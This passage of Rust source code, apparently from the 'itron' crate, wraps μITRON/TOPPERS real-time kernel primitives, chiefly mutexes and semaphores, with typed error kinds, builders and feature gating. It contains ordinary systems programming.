    impl Drop for Semaphore {
        #[inline]
        fn drop(&mut self) {
            // Panics on deletion failure, per the type-level documentation.
            unsafe { self.0.delete().unwrap() };
        }
    }
    impl Semaphore {
        /// Construct a `Semaphore` from a raw object ID.
        ///
        /// # Safety
        ///
        /// See [Object ID Wrappers](crate#object-id-wrappers).
        #[inline]
        pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
            Self(unsafe { SemaphoreRef::from_raw_nonnull(id) })
        }
        /// Consume and "leak" `self`, returning a reference `SemaphoreRef<'a>`.
        #[inline]
        pub const fn leak<'a>(self) -> SemaphoreRef<'a> {
            // `forget` skips `drop`, so the semaphore is never deleted.
            let out = self.0;
            core::mem::forget(self);
            out
        }
        /// Get the raw object ID.
        #[inline]
        pub const fn as_raw(&self) -> abi::ID {
            self.0.as_raw()
        }
        /// Get the raw object ID as [`abi::NonNullID`].
        #[inline]
        pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
            self.0.as_raw_nonnull()
        }
        /// Borrow `Semaphore` as [`SemaphoreRef`].
        ///
        /// Use this to perform operations on semaphores because most of the
        /// methods are implemented on `SemaphoreRef` but not `Semaphore`.
        #[inline]
        pub const fn as_ref(&self) -> SemaphoreRef<'_> {
            self.0
        }
    }
}
<file_sep>/src/eventflag.rs
//! Eventflags (TODO)
// TODO: acre_flg
// TODO: del_flg
// TODO: set_flg
// TODO: clr_flg
// TODO: wai_flg
// TODO: pol_flg
// TODO: twai_flg
// TODO: ini_flg
// TODO: ref_flg
<file_sep>/src/lib.rs
#![no_std]
#![cfg_attr(feature = "doc_cfg", feature(doc_cfg))]
#![cfg_attr(feature = "nightly", feature(decl_macro))]
#![doc = include_str!("lib.md")]
#![deny(unsafe_op_in_unsafe_fn)]
#![allow(clippy::match_single_binding)] // the `cfg` matching pattern
#![warn(clippy::doc_markdown)]
#![warn(clippy::enum_glob_use)]
#![warn(clippy::if_not_else)]
#![warn(rust_2018_idioms)]
#![cfg_attr(feature = "none", allow(unused_imports))]
#![cfg_attr(feature = "none", allow(unreachable_code))]
#![cfg_attr(feature = "none", allow(unused_variables))]
#![cfg_attr(feature = "none", allow(dead_code))]
/// Changelog (`CHANGELOG.md`)
///
#[doc = include_str!("../CHANGELOG.md")]
// Empty module that exists solely to surface the changelog in rustdoc.
pub mod _changelog_ {}
pub mod abi;
#[cfg(all(feature = "nightly", feature = "unstable"))]
#[cfg_attr(
feature = "doc_cfg",
doc(cfg(all(feature = "nightly", feature = "unstable")))
)]
pub mod macros;
// Helper macro: wraps each listed module in
// `cfg(all(feature = "unstable", <module-specific cfg>))` and mirrors the
// same condition in rustdoc via `doc(cfg(...))` when `doc_cfg` is enabled.
// `$semicolon_or_brace` lets a module be declared either as `pub mod x;` or
// with an inline `pub mod x { ... }` body.
macro_rules! unstable_module {
    {$(
        $( #[macro_use $($unused:tt)*] )*
        $( #[doc = $doc:tt] )*
        $( #[cfg( $($cfg:tt)* )] )?
        pub mod $name:ident $semicolon_or_brace:tt
    )*} => {$(
        $( #[macro_use $($unused)*] )*
        $( #[doc = $doc] )*
        #[cfg(all(feature = "unstable", $($($cfg)*)?))]
        #[cfg_attr(
            feature = "doc_cfg",
            doc(cfg(all(feature = "unstable", $($($cfg)*)?)))
        )]
        pub mod $name $semicolon_or_brace
    )*};
}
// Every public API module is gated behind `feature = "unstable"`; see
// `unstable_module!` above.
unstable_module! {
    #[macro_use]
    pub mod error;
    pub mod closure;
    pub mod dataqueue;
    pub mod eventflag;
    pub mod interrupt;
    pub mod kernel;
    pub mod memorypool;
    #[cfg(any(
        all(feature = "asp3", feature = "messagebuf"),
        all(feature = "solid_asp3", feature = "messagebuf"),
        feature = "none",
    ))]
    pub mod messagebuffer;
    pub mod mutex;
    pub mod prioritydataqueue;
    pub mod processor;
    pub mod semaphore;
    pub mod task;
    pub mod wait;
    // TODO: spinlocks
    /// Temporal quantification
    pub mod time {
        mod duration;
        mod systime;
        mod timeout;
        pub use self::{duration::*, systime::*, timeout::*};
        // `use ::*` doesn't work with `pub macro`. This could be a bug.
        #[cfg(feature = "nightly")]
        pub use self::{duration::duration, timeout::timeout};
    }
}
<file_sep>/src/interrupt.rs
//! Interrupts (TODO)
// TODO: acre_isr
// TODO: del_isr
// TODO: dis_int
// TODO: ena_int
// TODO: clr_int
// TODO: ras_int
// TODO: prb_int
// TODO: chg_ipm
// TODO: get_ipm
<file_sep>/src/mutex.rs
//! Mutexes
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
    /// Error type for [`MutexRef::lock`].
    pub enum LockError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// Invalid or nonexistent object ID (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A task termination request arrived while waiting (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The mutex was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
        /// The calling task's priority is higher than the mutex's priority
        /// ceiling.
        ///
        /// # Rationale
        ///
        /// The `EINVAL` error of `pthread_mutex_lock`. This error kind is
        /// designed to accommodate any precondition violations that may occur
        /// in yet-to-be-seen kernels to be supported.
        #[cfg(not(feature = "none"))]
        BadParam,
        /// The calling task already owns the mutex.
        #[cfg(not(feature = "none"))]
        Deadlock,
    }
}
// Map a raw kernel error code to a `LockError`; unknown codes yield `None`.
impl ErrorKind for LockError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::Deadlock(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MutexRef::lock_timeout`].
    pub enum LockTimeoutError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// Invalid or nonexistent object ID (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
        /// The operation timed out (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A task termination request arrived while waiting (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The mutex was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
        /// The calling task's priority is higher than the mutex's priority
        /// ceiling.
        ///
        /// # Rationale
        ///
        /// The `EINVAL` error of `pthread_mutex_lock`. This error kind is
        /// designed to accommodate any precondition violations that may occur
        /// in yet-to-be-seen kernels to be supported.
        #[cfg(not(feature = "none"))]
        BadParam,
        /// The calling task already owns the mutex.
        #[cfg(not(feature = "none"))]
        Deadlock,
    }
}
// Map a raw kernel error code to a `LockTimeoutError`; unknown codes yield
// `None`.
impl ErrorKind for LockTimeoutError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // E_PAR is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::Deadlock(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MutexRef::try_lock`].
    pub enum TryLockError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid or nonexistent object ID (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
        /// The calling task's priority is higher than the mutex's priority
        /// ceiling.
        ///
        /// # Rationale
        ///
        /// The `EINVAL` error of `pthread_mutex_lock`. This error kind is
        /// designed to accommodate any precondition violations that may occur
        /// in yet-to-be-seen kernels to be supported.
        #[cfg(not(feature = "none"))]
        BadParam,
        /// The calling task already owns the mutex.
        #[cfg(not(feature = "none"))]
        Deadlock,
        /// The lock could not be acquired without blocking (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
    }
}
// Map a raw kernel error code to a `TryLockError`; unknown codes yield `None`.
impl ErrorKind for TryLockError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::Deadlock(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MutexRef::unlock`].
    pub enum UnlockError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid or nonexistent object ID (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
        /// The mutex is not the lastly-locked mutex currently owned by the
        /// calling task (TOPPERS third-generation kernels, `E_OBJ`). The mutex
        /// is not currently owned by the calling task (μITRON 4.0 and
        /// μT-Kernel, `E_ILUSE`).
        ///
        /// # Rationale
        ///
        /// The name was inspired by the FTP and SMTP error 503 (bad sequence of
        /// commands) and SOLID `SOLID_ERR_BADSEQUENCE`. A mutex is intended
        /// to be used in a specific sequence (lock followed by unlock). The
        /// TOPPERS third-generation kernels impose a more stringent requirement
        /// on the sequence: mutexes must be unlocked in a lock-reverse order.
        #[cfg(not(feature = "none"))]
        BadSequence,
    }
}
// Map a raw kernel error code to an `UnlockError`; unknown codes yield `None`.
impl ErrorKind for UnlockError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadSequence(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MutexRef::initialize`].
    pub enum InitializeError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid or nonexistent object ID (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
    }
}
// Map a raw kernel error code to an `InitializeError`; unknown codes yield
// `None`.
impl ErrorKind for InitializeError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MutexRef::info`].
    pub enum InfoError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid or nonexistent object ID (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
    }
}
// Map a raw kernel error code to an `InfoError`; unknown codes yield `None`.
impl ErrorKind for InfoError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`Mutex::build`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum BuildError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
        /// Ran out of mutex IDs.
        #[cfg(not(feature = "none"))]
        OutOfMemory,
        /// Bad parameter.
        ///
        /// - The priority ceiling is out of range (NGKI2037, `E_PAR`).
        ///
        /// - The priority ceiling refers to a priority value which is
        ///   configured to use subpriorities (NGKI3682, `E_ILUSE`).
        ///
        /// - Unrecognized flags are specified (NGKI2025, `E_RSATR`).
        ///
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}
#[cfg(feature = "dcre")]
// Map a raw kernel error code to a `BuildError`; unknown codes yield `None`.
impl ErrorKind for BuildError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_MACV` is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_NOID => Some(Self::OutOfMemory(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
            // `E_ILUSE` (subpriority conflict) only exists on kernels that
            // support subpriorities.
            #[cfg(any(
                all(feature = "asp3", feature = "subprio"),
                feature = "fmp3",
                feature = "solid_fmp3"
            ))]
            abi::E_ILUSE => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MutexRef::delete`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum DeleteError {
        /// Invalid calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid or nonexistent object ID (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Compiled out on all current targets.
        #[cfg(any())]
        AccessDenied,
        /// The object state disallows deletion (`E_OBJ`).
        #[cfg(not(feature = "none"))]
        BadState,
    }
}
#[cfg(feature = "dcre")]
// Map a raw kernel error code to a `DeleteError`; unknown codes yield `None`.
impl ErrorKind for DeleteError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
/// Mutex information returned by [`MutexRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
    // Raw `T_RMTX` snapshot filled in by `ref_mtx`.
    #[cfg(not(feature = "none"))]
    raw: abi::T_RMTX,
}
impl Info {
    /// Get the owning task's ID, if any.
    #[inline]
    pub fn owning_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.htskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// Get the first waiting task's ID, if any.
    #[inline]
    pub fn first_waiting_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.wtskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// A borrowed reference to a mutex.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct MutexRef<'a> {
    // Raw kernel object ID; `'a` limits how long the reference may be used.
    id: abi::NonNullID,
    _phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for MutexRef<'_> {
    /// Render the reference as `Mutex(<id>)`.
    fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result {
        formatter.write_fmt(format_args!("Mutex({})", self.id))
    }
}
/// # Object ID conversion
impl MutexRef<'_> {
    /// Construct a `MutexRef` from a raw object ID.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
        Self {
            id,
            _phantom: PhantomData,
        }
    }
    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(self) -> abi::ID {
        self.id.get()
    }
    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(self) -> abi::NonNullID {
        self.id
    }
}
/// # Management
impl MutexRef<'_> {
    /// `del_mtx`: Delete the mutex.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    #[doc(alias = "del_mtx")]
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::del_mtx(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ref_mtx`: Get the mutex's general information.
    #[inline]
    #[doc(alias = "ref_mtx")]
    pub fn info(self) -> Result<Info, Error<InfoError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                let mut pri = MaybeUninit::uninit();
                Error::err_if_negative(abi::ref_mtx(self.as_raw(), pri.as_mut_ptr()))?;
                // Safety: `ref_mtx` succeeded, so it filled `pri` in.
                Ok(Info {
                    raw: pri.assume_init(),
                })
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// # Mutex Operations
impl MutexRef<'_> {
    /// `loc_mtx`: Lock the mutex.
    #[inline]
    #[doc(alias = "loc_mtx")]
    pub fn lock(self) -> Result<(), Error<LockError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::loc_mtx(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `tloc_mtx`: Lock the mutex with timeout.
    #[inline]
    #[doc(alias = "tloc_mtx")]
    pub fn lock_timeout(self, tmo: Timeout) -> Result<(), Error<LockTimeoutError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::tloc_mtx(self.as_raw(), tmo.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ploc_mtx`: Attempt to lock the mutex. Returns immediately if it's
    /// already locked.
    #[inline]
    #[doc(alias = "ploc_mtx")]
    pub fn try_lock(self) -> Result<(), Error<TryLockError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::ploc_mtx(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `unl_mtx`: Unlock the mutex.
    #[inline]
    #[doc(alias = "unl_mtx")]
    pub fn unlock(self) -> Result<(), Error<UnlockError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::unl_mtx(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
    /// `ini_mtx`: Initialize the mutex.
    #[inline]
    #[doc(alias = "ini_mtx")]
    pub fn initialize(self) -> Result<(), Error<InitializeError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::ini_mtx(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
    use super::*;
    use crate::wait::QueueOrder;

    /// Specifies a priority protection protocol used by a [mutex](Mutex).
    #[derive(Debug, Clone, Copy, PartialEq, Eq)]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum PriorityProtection {
        /// No priority protection.
        None,
        /// The priority ceiling protocol.
        Ceiling {
            /// Specifies the priority ceiling.
            priority: crate::task::Priority,
        },
        #[cfg(any(feature = "none", all(feature = "solid_asp3", feature = "pi_mutex")))]
        #[cfg_attr(
            feature = "doc_cfg",
            doc(cfg(any(feature = "none", all(feature = "solid_asp3", feature = "pi_mutex"))))
        )]
        /// The priority inheritance protocol.
        Inherit,
    }

    impl PriorityProtection {
        /// Return `Some(Self::Inherit)` if it's supported by the target kernel.
        ///
        /// # Examples
        ///
        /// ```
        /// use itron::mutex::PriorityProtection;
        /// let priority_protection = PriorityProtection::inherit()
        ///     .unwrap_or(PriorityProtection::None);
        /// ```
        #[inline]
        #[allow(unreachable_code)]
        pub const fn inherit() -> Option<Self> {
            #[cfg(any(feature = "none", all(feature = "solid_asp3", feature = "pi_mutex")))]
            {
                return Some(Self::Inherit);
            }
            // Reached only when the `Inherit` variant is compiled out.
            None
        }
    }

    /// The builder type for [mutexes](Mutex). Created by [`Mutex::build`].
    ///
    /// Its generic parameters are an implementation detail.
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    #[must_use = "`Builder` creates nothing unless you call `.finish()`"]
    pub struct Builder {
        #[cfg(not(feature = "none"))]
        raw: abi::T_CMTX,
        // Stored separately from `raw` because `finish` needs to pick the
        // final `mtxatr`/`ceilpri` values based on this.
        priority_protection: PriorityProtection,
    }

    impl Mutex {
        /// `acre_mtx`: Create a builder for `Mutex`.
        ///
        /// # Examples
        ///
        /// ```rust,no_run
        /// use itron::mutex::Mutex;
        /// let mutex = Mutex::build()
        ///     .finish()
        ///     .expect("failed to create a mutex");
        ///
        /// mutex.as_ref().lock()
        ///     .expect("failed to perform a lock operation");
        /// mutex.as_ref().unlock()
        ///     .expect("failed to perform a unlock operation");
        /// ```
        ///
        /// ```rust,no_run
        /// use itron::mutex::{Mutex, PriorityProtection};
        /// let mutex = Mutex::build()
        ///     .priority_protection(PriorityProtection::Ceiling { priority: 4 })
        ///     .finish()
        ///     .expect("failed to create a priority-ceiling mutex");
        ///
        /// mutex.as_ref().lock()
        ///     .expect("failed to perform a lock operation");
        /// mutex.as_ref().unlock()
        ///     .expect("failed to perform a unlock operation");
        /// ```
        #[inline]
        #[doc(alias = "acre_mtx")]
        pub fn build() -> Builder {
            Builder {
                #[cfg(not(feature = "none"))]
                raw: abi::T_CMTX {
                    mtxatr: abi::TA_NULL,
                    ceilpri: 0,
                },
                priority_protection: PriorityProtection::None,
            }
        }
    }

    impl Builder {
        /// Specify the priority protection mechanism to use.
        /// Defaults to [`None`] when unspecified.
        ///
        /// [`None`]: PriorityProtection::None
        #[inline]
        pub fn priority_protection(self, value: PriorityProtection) -> Builder {
            Builder {
                // NOTE(review): this `cfg` omits the field initializer under
                // `feature = "none"`, making the setter a no-op there (the
                // old value is kept via `..self`). Harmless today because
                // `finish` is `unimplemented!()` for that configuration, but
                // confirm whether the `cfg` is intentional.
                #[cfg(not(feature = "none"))]
                priority_protection: value,
                ..self
            }
        }

        /// Specify the queue order. Defaults to `Fifo` when unspecified.
        ///
        /// Ignored if a priority protection protocol other than
        /// [`PriorityProtection::None`] is selected, because
        /// [`Builder::finish`] then overwrites the attribute word with
        /// the protocol's own attribute.
        #[inline]
        pub fn queue_order(self, value: QueueOrder) -> Builder {
            Builder {
                #[cfg(not(feature = "none"))]
                raw: abi::T_CMTX {
                    mtxatr: value.as_raw_atr(),
                    ..self.raw
                },
                ..self
            }
        }
    }

    impl Builder {
        /// Create a mutex using the specified parameters.
        #[allow(unused_mut)]
        pub fn finish(mut self) -> Result<Mutex, Error<BuildError>> {
            // Translate the stored priority protection choice into the raw
            // `mtxatr`/`ceilpri` fields expected by `acre_mtx`.
            match self.priority_protection {
                #[cfg(not(feature = "none"))]
                PriorityProtection::None => {}
                #[cfg(not(feature = "none"))]
                PriorityProtection::Ceiling { priority } => {
                    self.raw.mtxatr = abi::TA_CEILING;
                    self.raw.ceilpri = priority;
                }
                #[cfg(all(feature = "solid_asp3", feature = "pi_mutex"))]
                PriorityProtection::Inherit => {
                    self.raw.mtxatr = abi::TA_INHERIT;
                }
                #[cfg(feature = "none")]
                _ => unimplemented!(),
            }
            match () {
                #[cfg(not(feature = "none"))]
                () => unsafe {
                    let id = Error::err_if_negative(abi::acre_mtx(&self.raw))?;
                    // Safety: We own the mutex we create
                    Ok(Mutex::from_raw_nonnull(abi::NonNullID::new_unchecked(id)))
                },
                #[cfg(feature = "none")]
                () => unimplemented!(),
            }
        }
    }

    /// An owned mutex.
    ///
    /// [Deletes] the mutex automatically when dropped. The destructor will
    /// panic if the deletion fails.
    ///
    /// [Deletes]: MutexRef::delete
    #[derive(PartialEq, Eq)]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub struct Mutex(MutexRef<'static>);

    impl fmt::Debug for Mutex {
        #[inline]
        fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
            self.0.fmt(f)
        }
    }

    impl Drop for Mutex {
        #[inline]
        fn drop(&mut self) {
            unsafe { self.0.delete().unwrap() };
        }
    }

    impl Mutex {
        /// Construct a `Mutex` from a raw object ID.
        ///
        /// # Safety
        ///
        /// See [Object ID Wrappers](crate#object-id-wrappers).
        #[inline]
        pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
            Self(unsafe { MutexRef::from_raw_nonnull(id) })
        }

        /// Consume and "leak" `self`, returning a reference `MutexRef<'a>`.
        #[inline]
        pub const fn leak<'a>(self) -> MutexRef<'a> {
            let out = self.0;
            // Skip `Drop` so the kernel object survives.
            core::mem::forget(self);
            out
        }

        /// Get the raw object ID.
        #[inline]
        pub const fn as_raw(&self) -> abi::ID {
            self.0.as_raw()
        }

        /// Get the raw object ID as [`abi::NonNullID`].
        #[inline]
        pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
            self.0.as_raw_nonnull()
        }

        /// Borrow `Mutex` as [`MutexRef`].
        ///
        /// Use this to perform operations on mutexes because most of the
        /// methods are implemented on `MutexRef` but not `Mutex`.
        #[inline]
        pub const fn as_ref(&self) -> MutexRef<'_> {
            self.0
        }
    }
}
<file_sep>/tests/abi/symbols.rs
/// A known kernel API function, identified by its symbol name.
pub struct Func {
    /// The function's symbol name (e.g., `"act_tsk"`).
    pub name: &'static str,
}
#[allow(dead_code)]
#[allow(non_upper_case_globals)]
